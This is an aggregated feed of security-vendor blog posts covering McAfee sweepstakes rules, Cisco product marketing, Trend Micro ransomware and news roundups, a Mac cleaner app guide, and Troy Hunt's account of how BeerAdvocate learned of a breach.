The prizes for the #SecureMyLifeRT2Win Sweepstakes are two [2] $100 Amazon e-gift cards  (approximate retail value “ARV” of the prize is $100   USD; the total ARV of all gift cards is $200 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLifeRT2Win   Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

      7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #SecureMyLifeRT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the #SecureMyLifeRT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #SecureMyLifeRT2Win   Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #SecureMyLifeRT2Win   Sweepstakes -related activity, or participation in the #SecureMyLifeRT2Win  Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

      8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.

     2. Use of Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use           your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without               further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where           prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize           information for advertising, marketing, and promotional purposes without further permission or compensation.

         By entering this  sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

      9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #SecureMyLifeRT2Win   Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #SecureMyLifeRT2Win  Sweepstakes.

     10.Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLifeRT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLifeRT2Win   Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

     11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

     12.Privacy Notice: 

Personal information obtained in connection with this prize McAfee Day #RT2Win Sweepstakes will be handled in accordance policy set forth at

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before August 16th 2021 to the address listed below, Attn: #RT2Win Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Consumer Content Marketing. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! appeared first on McAfee Blogs.

Using Security Awareness to Empower Your Most Important Assets

You’ve invested time and money into the security of your organization’s network. You’re protecting everything from your data to endpoints and networks. So, it’s no surprise that your IT department throws its hands up when a happy clicker in your organization inadvertently launches a malware attack; enticed by what looked like a legitimate link in an email.

The volume of phishing threats continues to increase, and bad actors are getting more sophisticated; often meaning that the look and feel of phishing emails are increasingly authentic.

  • Over 3.4 billion email scams or phishing emails are sent every day. This adds up to one trillion email scams per year (Security Magazine)
  • Data breaches exposed 4.1 billion records in the first half of 2019. (RiskBased)
  • 62% of businesses experienced phishing and social engineering attacks in 2018. (Cybint Solutions)
  • 52% of breaches featured hacking, 28% involved malware and 32–33% included phishing or social engineering, respectively. (Verizon)

It’s become evident that, frequently, the weakest link in many cybersecurity defenses are people. In fact, according to the 2019 Gartner Magic Quadrant for Security Awareness Computer-Based Training, “People influence security more than technology or policy and cybercriminals know how to exploit human behaviors.”

So, while technology continues to evolve, the human element will always be the most unpredictable variable to secure. In order to fortify against people-enabled losses, organizations are turning to security awareness and training programs. Recent events have highlighted an increased need for security awareness as the vast move to a remote workforce has unveiled new, targeted threats that require employees to detect on their own.

Cisco Security Awareness is designed to help promote and apply effective cybersecurity common sense by modifying end-user behavior. Using engaging and relevant computer-based content with various simulated attack methods, this cloud-delivered product provides comprehensive simulation, training, and reporting so employee process can be continually monitored and tracked; an important part of compliance standards such as HIPAA and GDPR.

A Comprehensive Approach to Combat Phishing

Leveraging the power of other leading Cisco Security technologies, Cisco Security Awareness provides a comprehensive and robust defense against phishing attacks.

  • Analyze your organization’s security awareness needs and set strategic objectives
  • Plan your awareness program including phishing simulation, awareness training, communication, and reinforcement plan
  • Optimize program performance by setting and measuring against strategic metrics and KPIs

Empower the people in your organization to play a critical role in its overall security with Cisco Security Awareness. Sign up for a free trial today.

The post Using Security Awareness to Empower Your Most Important Assets appeared first on Cisco Blogs.

SMB Cybersecurity: More products, more problems?

The importance of a simplified approach to security

As cybercriminals continue to find new ways to breach security defenses, keeping your organization secure may start to feel overwhelming. Security teams are constantly striving to stay ahead, but it can be difficult to decide what to prioritize. So, in a sea of new security products and recommendations, how can small and medium sized businesses decide where to invest their finite resources?

In a recent Cisco Chat Live streamcast, Cisco Product Marketing Manager Hazel Burton, Cisco Advisory CISO Wolf Goerlich, and Elevate Security Co-founder Masha Sedova sit down to discuss ways of cutting through the noise and simplifying security.


More products, more problems?

Wolf Goerlich describes an outage he and his team faced in a previous organization, during which their remediation was complicated by too many alerts:

“The security guy comes back and says, ‘It’s clearly a denial of service.’ I said, ‘Alright. That kind of makes sense with your data.’ The networking guy goes, ‘Wait a minute. We think the problem is on the edge because we’re not seeing many packets.’ The compute guy says, ‘No, the problem is clearly on our servers because the CPU is spiking right now’…. The entire outage got stretched out just trying to get everyone on the same page with all of these counsels on these data points.”

This anecdote is also supported by a survey we conducted across almost 500 SMBs (defined here as organizations with 250-499 employees). Respondents were asked to report the number of hours lost during the most severe security breach faced in the past year. This was correlated with the number of security vendors their organization uses.

Number of security vendors used within security environment and systems downtime due to the most severe security breach managed in the past year
Source: SMB Cybersecurity Report

Surprisingly, it appears that the more vendors an organization used, the less effective those tools were in mitigating a severe breach. In fact, organizations using 2-5 vendors had an estimated downtime of around 5 hours, while organizations using 50 or more vendors reported an average downtime of about 17 hours.

While there are a multitude of reasons behind why certain breaches cause longer downtimes than others, the complexity of trying to compile data across many vendors and tools seems to be a contributing factor.

The importance of not exceeding your team’s “cognitive maximum”

This data suggests that security teams have a limit to the number of tools they can feasibly juggle before reaching what Wolf coins as their “cognitive maximum.” When security teams are asked to use an overwhelming number of products, they may not be able to pinpoint where an issue lies.

Unfortunately, security teams that feel inundated by tools and disparate data can experience cybersecurity fatigue – or the feeling that they simply can’t keep up with incoming threats. To learn more about the symptoms of cybersecurity fatigue and how it can be managed, check out the clip below.

Homing in on the solutions that will best help you

To avoid overwhelming security teams, Masha Sedova recommends focusing on the threats your organization is most vulnerable to experiencing. Getting to know which threats most impact you and prioritizing accordingly is a great way to simplify your security approach, and may help when deciding which solutions are worth investing in.

Masha suggests using tools like the Verizon Data Breach Investigations Report to determine which risks to consider targeting. In the second installment of our SMB Cybersecurity Series, we discussed the SMB threat landscape. You can see our findings on which threats SMBs are currently facing here. Additionally, Cisco’s Threat of the Month series recently dedicated a post to the remote work threat landscape, which can be found here.

Keeping it simple by focusing on the basics

One of the best measures to keep your security program as simple as possible, as Masha recommends, is making sure the basics are covered. Knowing which data is stored where, for example, can be extremely helpful in determining where an attack is coming from.

With a solid foundation and a good understanding of what to prioritize, you may find it easier to incorporate relevant security solutions without adding undue complexity. For more tips on simplifying your security operations, check out the clip above. To watch the full Cisco Chat Live discussion, please visit Cisco Chat Live SMB Myth Busting.

Note: This blog is the last in a five-part series.

Read the previous blogs in our SMB Cybersecurity Series to learn more.

If you are interested in unpacking more myths surrounding SMB security, consider reading “Big Security in a Small Business World.”

The post SMB Cybersecurity: More products, more problems? appeared first on Cisco Blogs.

Cisco SecureX – What’s driving our platform?

Learn about the latest innovations powering our integrated security approach

Cisco SecureX is the result of many years of developing industry-leading security technologies, and then finding ways to make them even better by enabling them to work together. It’s a careful balance of building a platform out of the capabilities of each product, which then adds to the experience of having all of those products and makes each product stronger. Sound like a lot to expect? It’s the least we can do for our customers.

“Having all of Cisco’s tools so well integrated really gives us defense-in-depth and layered protection,” said Don Bryant, CISO at The University of North Carolina at Pembroke, in our recent report, Simplify to Secure. “Having a more holistic security platform has really helped us make more progress toward our end goal in a short amount of time.”

Indeed, a platform should bring forth an already strong roster of security technologies, and then further improve upon them through integration, automation, and continued innovation. The Cisco Secure portfolio is built on a broad set of capabilities that protect your network, users and endpoints, cloud, and applications. And it’s backed by the unrivaled threat intelligence of Cisco Talos. SecureX draws from all of this to enhance collaboration among your teams, and visibility across your infrastructure, with the end goal of streamlining security operations and accelerating threat response.

And innovation continues across the products and platform. Along with the launch of Cisco SecureX came several new capabilities that help future-proof our solutions. We don’t just want to offer you a platform and call it a day. Cisco SecureX is meant to be a living, breathing entity that evolves with you as your needs change. It’s a mix of well-established and new security offerings, and it will continue to adapt as the threat landscape expands.

Our core technologies – made better

Cisco delivers unparalleled security analytics across network and cloud

When enterprise networks began to expand with the introduction of cloud and BYOD, for example, one of our core technologies, in this case providing network traffic analytics, was on the front lines. In fact, Cisco Stealthwatch was created two decades ago to provide much-needed visibility into enterprise environments. That need only grew as infrastructure extended beyond the physical walls of modern businesses. Now, Stealthwatch gives our customers the benefit of a network analytics offering that has grown up with the networks it helps secure.

As the attack surface has evolved over the years and threat actors have become more sophisticated, Stealthwatch has continued to serve as the eyes and ears of the network – delivering pervasive insight into who’s in your environment and what they’re doing – 24/7/365. Today, as much of the world’s population works from home, we find ourselves at another crossroads where there’s an unprecedented need for Stealthwatch’s in-depth, scalable analytics.

Stealthwatch is again rising to the challenge, closely monitoring organizations’ extended infrastructure for any anomalies that could signify an attack. In addition to on-premises network traffic, Stealthwatch can also monitor all major public cloud environments, as well as private clouds and endpoint data, to provide truly comprehensive visibility. And, it’s the only solution that can perform analytics on encrypted traffic without decryption.

By being a part of Cisco SecureX, Stealthwatch gains greater context into network and user behaviors from across the portfolio, and can also leverage the platform to take automated mitigation actions. Likewise, the other solutions within our portfolio can pull from Stealthwatch’s insights to increase their efficacy. This results in expedited incident investigations and remediation across the platform.

Cisco Talos brings unrivaled threat intelligence 

Cisco Talos is the largest, non-governmental threat intelligence team in the world, with over 350 professionals working around the clock to uncover emerging threats. For years, its findings have been fed into our entire security portfolio, including Stealthwatch, to strengthen our customers’ defenses.

Due to the breadth of Cisco’s security offerings and our immense volume of customers and partners, Cisco Talos has more visibility into emerging threats than any other security vendor in the world. But the team doesn’t just sit back and wait for intelligence to flow in. Every day, Talos researchers are proactively hunting for vulnerabilities and other issues that could impact global security. And when issues are discovered, coverage is pushed to all of our security products as fast as possible to ensure customers are protected.

If you think about Cisco SecureX as a car, with the various components of our portfolio working together to make it run smoothly, you can view Cisco Talos as the fuel powering the whole vehicle onwards.

What’s new?   

Making threat hunting more accessible

Despite all of the various defenses organizations have in place today to catch threats, some remain hidden and difficult to detect. The practice of threat hunting has emerged to try to combat these more covert security issues. However, threat hunting still remains challenging for many organizations due to a shortage of skilled professionals and advanced tools.

With the launch of SecureX, we unveiled SecureX Threat Hunting, fueled by Cisco Talos. SecureX Threat Hunting assists security teams by helping to uncover hidden threats and providing recommended next steps for further investigation and remediation. Offered as part of our endpoint protection, it allows organizations to take a more proactive approach to security. 

You’ve got (secure) mail

Email remains the number one threat vector for launching cyberattacks on today’s organizations. However, many security solutions are still missing effective email protection. The need for comprehensive email security has risen even further as more companies have transitioned from traditional email systems to cloud-based email solutions such as Office 365, and have found that they lack advanced security with those platforms.

Gartner expects that by 2021, 70% of public and private companies will be using cloud email services. Building off of our proven, multi-layered email security solutions, we’ve recently launched Cisco Cloud Mailbox Defense to address this transition to the cloud.

Cisco Cloud Mailbox Defense is a cloud-native email security platform that provides insight into inbound, outbound, and internal messages, as well as easy attack remediation. Like Cisco SecureX, it is built on the principles of visibility, simplicity, and integration. Being part of a larger security platform further enhances email security by increasing context and enabling a more efficient, coordinated response to email-based attacks.

Helping you embrace the cloud  

The cloud is being widely adopted not just for email, but for many other technologies – especially as employees work from home and demand more flexible, convenient access to business applications. We want to make sure that customers can embrace the many benefits of the cloud while still keeping their assets and data secure.

That is why we’ve collaborated with Amazon Web Services (AWS) to develop solutions that help Cisco customers accelerate their adoption of AWS cloud services, while maintaining a consistent security posture across their environment – from on-prem to cloud. We want to ensure that key security concepts including visibility, segmentation, threat protection, and identity and access management are carried over as customers transition to AWS.

At the end of the day, Cisco SecureX is not just about us. It’s not just about making our own products work with one another. We want them to work with your other technologies as well – from security products to major infrastructure – so you can have all hands on deck when it comes to protecting your organization.

Protecting what’s now and what’s next

According to ESG, “Enterprise-class cybersecurity technology vendors can do a lot of the grunt work by tightly integrating their best-of-breed products into scalable and interoperable technology architectures.” That is our goal with Cisco SecureX. The solutions highlighted above represent just a few examples of how we’re helping customers secure what’s now and what’s next – by pairing long-time, industry-leading technologies with new, innovative solutions.

Whether you’re new to Cisco Secure, or you already use many of our technologies, you can begin benefiting from the integration and automation delivered by Cisco SecureX today. Get started now.


The post Cisco SecureX – What’s driving our platform? appeared first on Cisco Blogs.

Ransomware is Still a Blight on Business

Ransomware is Still a Blight on Business

Trends come and go with alarming regularity in cybersecurity. Yet a persistent menace over the past few years has been ransomware. Now mainly targeting organizations rather than consumers, and with increasingly sophisticated tools and tactics at their disposal, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Celebrating its fourth anniversary this week, the initiative has helped over four million victims fight the scourge of ransomware, saving hundreds of millions of dollars in the process. At Trend Micro, we’re proud to have played a major part, helping to decrypt over 77 million files for victims.

Not going anywhere

Ransomware has been with us for years, but only really hit the mainstream after the global WannaCry and NotPetya incidents of 2017. Unfortunately, that was just the start. Today, no sector is safe. We saw attacks rage across US municipalities, school districts and hospitals in 2019. Most recently, a major outage at a connected technology giant impacted everything from consumer fitness trackers to on-board flight systems.

Such attacks can hit victim organizations hard. There are serious reputational and financial repercussions from major service outages, and the stakes have been raised even further as attackers now often steal data before encrypting victims’ files. A recent incident at a US cloud computing provider has led to data compromise at over 20 universities and charities in the UK and North America, for example. A separate ransomware attack on a managed service provider earlier this year may cost it up to $70m.

The bad guys have shown no sign of slowing down during the pandemic — quite the reverse. Even as hospitals have been battling to save the lives of patients battling COVID-19, they’ve been targeted by ransomware designed to lock mission-critical systems.

No More Ransom

That’s why we need to celebrate public-private partnerships like No More Ransom, which provides helpful advice for victims and a free decryption tool repository. Over the past four years it has helped 4.2 million visitors from 188 countries, preventing an estimated $632 million in ransom demands finding its way into the pockets of cyber-criminals.

At Trend Micro, we’re proud to have been an associate partner from the very start, contributing our own decryption tools to the scores available today to unlock 140 separate ransomware types. Since the start of No More Ransom, Trend Micro tools have been downloaded nearly half a million times, helping over 50,000 victims globally to decrypt more than 77 million files. We simply can’t put a price on this kind of intervention. 

Yet while the initiative is a vital response to the continued threat posed by ransomware, it is not all we can do. To truly beat this menace, we need to educate organizations all over the planet to improve their resilience to such malware threats. That means taking simple steps such as:

  • Backing up regularly, according to best practice 3-2-1 policy
  • Installing effective AV from a trusted vendor, featuring behavior monitoring, app whitelisting and web reputation
  • Training staff how to better spot phishing attacks
  • Ensuring software and systems are always on the latest version
  • Protecting the enterprise across endpoint, hybrid cloud, network and email/web gateways

I’m also speaking on a panel today hosted by the U.S. Chamber of Commerce on NotPetya and general ransomware attack trends related to the pandemic. Join us to learn more about ransomware from law enforcement agencies, policy makers and businesses.

If your organization has been impacted by ransomware, check the resources available on for advice and access to the free decryption tool repository.

The post Ransomware is Still a Blight on Business appeared first on .

This Week in Security News: Trend Micro Research Uncovers the Business Infrastructure of Cybercrime and Apple Launches Security Device Research Program

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read new insights from Trend Micro that look at the market for underground hosting services and where cybercriminals rent the infrastructure for their business. Also, learn about Apple’s new iPhone Research Device Program that will provide certain hackers with special devices to conduct security research.

Read on:

Trend Micro Research Uncovers the Business Infrastructure of Cybercrime

This week Trend Micro released new insights analyzing the market for underground hosting services and detailing how and where cybercriminals rent the infrastructure that hosts their business. This first report of a planned three-part series details the market for buying and selling these services, which are the backbone of every other aspect of the cybercriminal business model, whether that includes sending spam, communicating with a command and control server, or offering a help desk for ransomware.

Have You Considered your Organization’s Technical Debt?

In the tech world where one seemingly tiny vulnerability can bring down your whole system, managing technical debt is critical. Fixing issues before they become emergent situations is necessary in order to succeed. By spending a little time each day to tidy up a few things, you can make your system more stable and provide a better experience for both your customers and your fellow developers.

New ‘Shadow Attack’ Can Replace Content in Digitally Signed PDF Files

Fifteen out of 28 desktop PDF viewer applications are vulnerable to a new attack that lets malicious threat actors modify the content of digitally signed PDF documents. The list of vulnerable applications includes Adobe Acrobat Pro, Adobe Acrobat Reader, Perfect PDF, Foxit Reader, PDFelement, and others, according to new research published this week by academics from the Ruhr-University Bochum in Germany.

Cleaner One Pro Speeds Up Your Mac: Part 2

In the first part of this blog series, Trend Micro introduced its Cleaner One Pro, a one-stop shop to help you speed up your Mac, highlighting the quick optimizer, the main console, and the cleaning tools. In part two, Trend Micro resumes the discussion of how to make your Mac run faster with more Cleaner One Pro features: system and application management, privacy protection and other options.

Multi-Platform Malware Framework Linked to North Korean Hackers

Security researchers at Kaspersky have identified a multi-platform malware framework that they believe North Korea-linked hackers have been leveraging in attacks over the past couple of years. Called MATA, the platform appears to have been in use since spring 2018 to target computers running Windows, Linux, and macOS. The framework, which consists of components such as a loader, an orchestrator, and plugins, is believed to be linked to the prolific North Korean hacking group Lazarus.

Updates on ThiefQuest, the Quickly-Evolving macOS Malware

In early July, Trend Micro noticed a new malware dubbed ThiefQuest, a threat that targets macOS devices, encrypts files, and installs keyloggers in affected systems. However, new reports on the malware state the assumption that the malware’s ransomware activity is not its main attack method; rather, it is a pre-emptive move to disguise its other capabilities such as file exfiltration, Command and Control (C&C) communication, and keylogging.

Apple’s Long-Awaited Security Device Research Program Makes its Debut

In order to make it easier for security researchers to find vulnerabilities in iPhones, Apple is launching an iPhone Research Device Program that will provide certain hackers with special devices to conduct security research. Beyond enhancing security for iOS users and making it easier to unearth flaws in iPhones, the program also aims to improve the efficiency of ongoing security research on iOS.

Guidelines Related to Security in Smart Factories Part 5: CIS Controls

The purpose of this blog series is to explain typical examples of general-purpose guidelines for ICS and OT security and understand the concepts required for security in smart factories. As a subset of NIST SP800-53 which was introduced in part four, part five explains the CIS Controls that correspond to practical guides.

US Charges Two Chinese Spies for a Global Hacking Campaign that Targeted COVID-19 Research

U.S. prosecutors have charged two Chinese nationals, said to be working for China’s state intelligence bureau, for their alleged involvement in a massive global hacking operation that targeted hundreds of companies and governments for more than a decade. The 11-count indictment, unsealed Tuesday, alleges Li Xiaoyu, 34, and Dong Jiazhi, 33, stole terabytes of data from high-technology companies around the world—including the United States.

Twitter Hacked in Bitcoin Scam

Are Apple, Elon Musk, Barrack Obama, Uber, Joe Biden, and a host of others participating in a very transparent bitcoin scheme? No. The question was whether individual accounts were compromised or if something deeper was going on. Underlying this whole situation is a more challenging issue: The level of access that support has to any given system.

What are your thoughts on Apple’s new iPhone Research Device program? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Research Uncovers the Business Infrastructure of Cybercrime and Apple Launches Security Device Research Program appeared first on .

Cleaner One Pro Speeds Up Your Mac: Part 2

In Part 1 of this blog, we introduced Trend Micro Cleaner One Pro, a one-stop shop to help you speed up your Mac, highlighting the Quick Optimizer, the Main Console, and the Cleaning Tools. In Part 2, we resume the discussion of how to make your Mac run faster with the remaining Cleaner One Pro features: System and Application Management, Privacy Protection, and Other Options.

System and Application Management

Startup Manager

Your Mac may get sluggish after a year or two of usage and you may find that booting up takes a lot longer. Doing a Startup Manager scan can help you reduce slowdown due to unwanted startup programs and services, to help your Mac boot faster.

Upon completing the scan, Startup Manager will identify apps under two categories: Login Items and Launch Agents.

Login Items are apps that run automatically upon login. You can manage these apps by enabling them to run automatically or disabling them to make your Mac more efficient. If you don’t need autorun, you can remove the apps from the list.

Launch Agents are background services that run automatically on System startup for the extension features of apps. You can manage these services by letting them run automatically or by disabling them to make your Mac boot faster. Similarly, you can remove these agents if you don’t need them or they’re broken.


App Manager

When a user installs an app that doesn’t meet their expectations, they’ll never use it again. In many cases, they remove the app by simply dragging it into the trash, assuming the action completely removes the app, but this is not always true. When you uninstall an app, there are often associated files left on your Mac, even after you have emptied the Trash. They’re known as leftovers.

Leftovers are an app’s associated files and folders that can include different languages, log files, agents, or processes that might try to start an application. App Manager aims to resolve this and helps you clean up your Mac by completely removing app leftovers. App Manager detects all app leftovers automatically so you can remove them with just one click.


Privacy Protection

File Shredder

Data security and privacy are especially important and managing these applies to anyone collecting and keeping data. Data that has reached its retention limit needs to be permanently removed from your file system and to be sure it can’t be recovered you need to overwrite the file with random series of binary data multiple times. This process is often referred to as shredding. With File Shredder, you can remove sensitive files from your hard disk without worrying that they can be recovered.


Other Options


Preferences allows you to manage how the Cleaner One Pro app performs. In Preferences, you’ll see General, Notifications, Memory, Duplicates, Whitelists and Auto Select.

On the General tab, you can choose Auto start at login and other options according to how you would like Cleaner One Pro to behave during startup.


On the Notifications tab, you can disable the notification about smart memory optimization.


Cleaner One Pro is also equipped with a Smart Memory Optimization feature on the Memory tab. This feature uses artificial intelligence. You can set auto clean when your available memory is low or when an app is closed.


The Duplicates, Whitelists and Auto Select tabs work when you use the Duplicate Files feature on the main console. When there are too many duplicate files on your Mac, you can set the rules on the minimum file size, as well as which files to exempt or prioritize during deletion.


Air Support One

If you need technical assistance about Cleaner One Pro, click the robot icon either in the Apple Menu window or on the Main Console.

A chat support person will attend to your concerns or suggestions when using Cleaner One Pro. In case there is no available support engineer, you can send an email by clicking Send Email. Make sure to provide the correct email address.

More Tools

Aside from Cleaner One Pro for Mac, we offer Antivirus One for Mac—as well as Cleaner One for iPhone, which you can download by scanning the QR Code. You can also submit your ideas for Other Tools by clicking the panel.


An Optimized Mac

As you use your Mac over time, you need to maintain it to keep it running smoothly. Trend Micro Cleaner One Pro can clean up your disk space, help boost performance, and solve other Mac issues you might encounter during your daily work. As you consider it for your Mac, you may have remaining questions:

What’s the difference between the Free version and the Paid version? The Free version of Cleaner One Pro includes the Memory Optimizer, basic CPU and Network Monitoring, a Junk Files Cleaner, a Big Files Scanner, a Disk Map, and the Startup Manager. The Paid upgrade of Cleaner One Pro unlocks more features, including more Advanced CPU/Network Monitoring, a Duplicate Finder, a Similar Photos Scanner, an App Manager, and a File Shredder.

Is it safe to use Cleaner One Pro? Cleaner One Pro is notarized by Apple, which assures its users both security and privacy.

How can I download Cleaner One Pro? Cleaner One Pro is distributed via the official Trend Micro website and other authorized channels. Note that Cleaner One Pro is also available for Windows. To make it easy for the readers of this blog series, we’ve provided the download links here: Download Windows Version

Go to Cleaner One Windows or to Cleaner One Mac for more information or to purchase the apps.

The post Cleaner One Pro Speeds Up Your Mac: Part 2 appeared first on .

How BeerAdvocate Learned They’d Been Pwned

How BeerAdvocate Learned They'd Been Pwned

I love beer. This comes as no surprise to regular followers, nor should it come as a surprise that I maintain an Untappd account, logging my beer experiences as I (used to 😢) travel around the world partaking in local beverages. When I received an email from someone over that way who happened to be a happy Have I Been Pwned (HIBP) user and wanted some cyber-assistance, I was intrigued. You'll never believe what happened next...

The tl;dr is that someone with a BeerAdvocate account was convinced the service had been pwned as they'd seen evidence of an email address and password they'd used on the service being abused. They reached out to my guy (we'll call him that for the sake of brevity) who then reached out to me. The relevance to Untappd is that they both share the same parent company (Next Glass) which picked up BeerAdvocate earlier this year and inevitably, they also now share some of their human resources.

Peeling back the layers a bit more, it's interesting to understand what the indicator of compromise was that alerted the (unhappy) BeerAdvocate user in the first place. With the caveat that I have nothing but circumstantial evidence to tie this person to the one who reached out to Next Glass, there's a thread on Reddit that aligns very closely to the facts of the matter:

In february 2020, I received an email from Netflix that I had signed up for an account. This was to an email address that is completely unique to beeradvocate (as is the custom I do with many sites I sign up for). Someone had registered a new Netflix account with my email / password associated with my BeerAdvocate account. This email address & password combination has existed only in two places: my memory and beeradvocate's database. Not even a password manager.

My going in position when contacted was that this would be yet another case of someone unfairly misattributing a breach to an organisation based purely on what they believe to be a unique email address or password being used in a way they didn't expect. I see this all the time and I literally have a blog post in progress titled "Has a Site Been Breached Because I Received an Email to an Address Unique to Them?" It details many different reasons for this behaviour that are entirely unrelated to a breach and in my experience, there is almost always a non-breach explanation. But not this time.

Plugging the email address in question into HIBP resulted in only a single hit:

How BeerAdvocate Learned They'd Been Pwned

Unverified breaches are incidents where the data is legitimate (for example, people's real email addresses and passwords), but I haven't been able to confirm the legitimacy of the source. Per the description in the breach above, that incident definitely had data that could be traced back to both Coupon Mom and Armor Games, but what else might be in there? I pulled out the original breach and searched for "beeradvocate". 816 rows came back:

How BeerAdvocate Learned They'd Been Pwned

Well that's... damning. You simply don't have that many matches without there being a very high likelihood BeerAdvocate had suffered a data breach. For every one instance of an email address or password with the string "beeradvocate" in it there'll be another 100 instances that still came from their service but didn't use a customised email alias or (let's face it) very poorly chosen password. On the balance of evidence, they had indeed been breached and their data rolled in with at least the two other organisations into what was now effectively a credential stuffing list.

On Friday, BeerAdvocate / Next Glass contacted impacted customers and published a public disclosure notice:

After a thorough investigation from an independent third party cyber security firm, it was confirmed that BeerAdvocate user login credentials (email address, BeerAdvocate forum password) were lost and aggregated along with breaches of other websites into a breach dataset that became known as CouponMom 2014.

I'd argue that they're not lost, instead there's actually a lot of backups of them! They dated the breach back to "seven or eight years ago" and stated that "a since-retired password hashing method allowed some passwords to be derived". They don't state which algorithm was used, but it's a safe bet it was MD5 or SHA-1 which was already pretty fundamentally flawed by that time. I personally would have approached a number of things around this incident differently, but Next Glass still deserves some kudos for taking the concerns of the individual who raised this seriously and seeing it through to its conclusion, especially given they inherited this breach by virtue of the BeerAdvocate acquisition.

Just one more thing - I've often been asked why I don't discard the source data of a breach once processed and email addresses loaded into HIBP. Putting aside the fact that discarding it doesn't actually make it go away (a quick search found this data still being extensively traded), historical breaches can be enormously useful in establishing the origin of subsequent breaches. This incident exemplifies that and without ready access to this data I don't know that BeerAdvocate would have established the breach, notified their customers and given them the opportunity to go and change that same one password they use across all their other accounts...

Cheers! 🍺

This Week in Security News: Trend Micro Research Discovers Cybercriminal Turf War on Routers and a Massive Twitter Breach Compromises Some of the World’s Most Prominent Accounts

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about Trend Micro’s report on the botnet battle for IoT territory and how attacker groups are trying to gain control of vulnerable routers and other devices. Also, learn about a Twitter breach that happened earlier this week, involving some of the most well-known and wealthiest people and brands globally.

Read on:

‘DDoS-For-Hire’ is Fueling a New Wave of Attacks

Earlier this week, Trend Micro released a report about escalating global turf wars between attacker groups vying to seize control of vulnerable routers and other devices, titled “Worm War: The Botnet Battle for IoT Territory.” Robert McArdle, director of Trend Micro’s forward-looking threat research (FTR) and David Sancho, senior threat researcher, spoke with WIRED about findings from the report and how the aim of attacker groups is to power botnets that can direct a firehose of malign traffic or requests for DDoS attacks.

Extraordinary Twitter Hack Compromises Some of the World’s Most Prominent Accounts

Earlier this week, hackers hijacked the Twitter accounts of some of the world’s most prominent and wealthiest people and brands including Barack Obama, Joe Biden, Kanye West, Jeff Bezos, Bill Gates, Elon Musk and tech giant Apple. These hacked accounts sent out messages promising bitcoin payments as part of a scam.

Tax Scams – Everything You Need to Know to Keep Your Money and Data Safe

